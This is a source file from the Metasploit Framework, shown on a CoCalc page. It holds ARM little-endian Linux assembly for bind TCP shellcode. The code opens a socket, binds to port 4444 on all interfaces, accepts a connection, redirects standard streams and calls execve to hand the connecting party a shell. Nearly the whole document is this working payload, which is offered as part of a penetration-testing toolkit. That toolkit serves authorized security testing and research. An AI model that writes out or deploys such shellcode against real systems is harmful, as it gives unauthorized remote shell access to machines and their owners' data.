CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/linux/armle/single_sock_bind.s
Views: 11784
1
@@

2
@

3
@        Name: single_sock_bind

4
@   Qualities: -

5
@     Authors: civ, repmovsb

6
@     License: MSF_LICENSE

7
@ Description:

8
@

9
@        Implementation of a Linux bind TCP shellcode for ARM LE architecture.

10
@

11
@        This source is built from the payload module (instead of other way around...)

12
@

13
@        Assemble with: as single_sock_bind.s -o single_sock_bind.o

14
@        Link with:     ld single_sock_bind.o -o single_sock_bind

15
@

16
@ Meta-Information:

17
@

18
@ meta-shortname=Linux Bind TCP

19
@ meta-description=Listen on a port for a connection and run a second stage

20
@ meta-authors=civ, repmovsb

21
@ meta-os=linux

22
@ meta-arch=armle

23
@ meta-category=singles

24
@ meta-connection-type=bind

25
@ meta-name=bind_tcp

26
@@

27


28
.text

29
.globl _start

30
_start:

31
@ int socket(int domain, int type, int protocol);

32
@ socket(2,1,6)

33
       mov     r0, #2

34
       mov     r1, #1

35
       mov     r2, #6

36
       mov     r7, #1

37
       lsl     r7, r7, #8

38
       add     r7, r7, #25

39
       svc     0

40
       mov     r6, r0

41


42
@ bind

43
       add     r1, pc, #128

44
       mov     r2, #16

45
       mov     r7, #1

46
       lsl     r7, r7, #8

47
       add     r7, r7, #26

48
       svc     0

49


50
@ listen

51
       mov     r0, r6

52
       mov     r7, #1

53
       lsl     r7, r7, #8

54
       add     r7, r7, #28

55
       svc     0

56


57
@ accept

58
       mov     r0, r6

59
       sub     r1, r1, r1

60
       sub     r2, r2, r2

61
       mov     r7, #1

62
       lsl     r7, r7, #8

63
       add     r7, r7, #29

64
       svc     0

65


66
@ dup

67
       mov     r6, r0

68
       mov     r1, #2

69
loop:

70
       mov     r0, r6

71
       mov     r7, #63

72
       svc     0

73
       subs    r1, r1, #1 

74
       bpl     loop

75


76
@ execve(SHELL, [ARGV0], [NULL])

77
       add     r0, pc, #36

78
       eor     r4, r4, r4

79
       push    {r4}

80
       mov     r2, sp

81
       add     r4, pc, #36

82
       push    {r4}

83
       mov     r1, sp

84
       mov     r7, #11

85
       svc     0

86


87
@ addr

88
@ port: 4444 , sin_fam = 2

89
.word   0x5c110002

90
@ ip: 0.0.0.0

91
.word   0x00000000

92


93
@ SHELL

94
.word 0x00000000 @ the shell goes here!

95
.word 0x00000000

96
.word 0x00000000

97
.word 0x00000000

98
@ ARGV0

99
.word 0x00000000 @ the args!

100
.word 0x00000000

101
.word 0x00000000

102
.word 0x00000000

103


104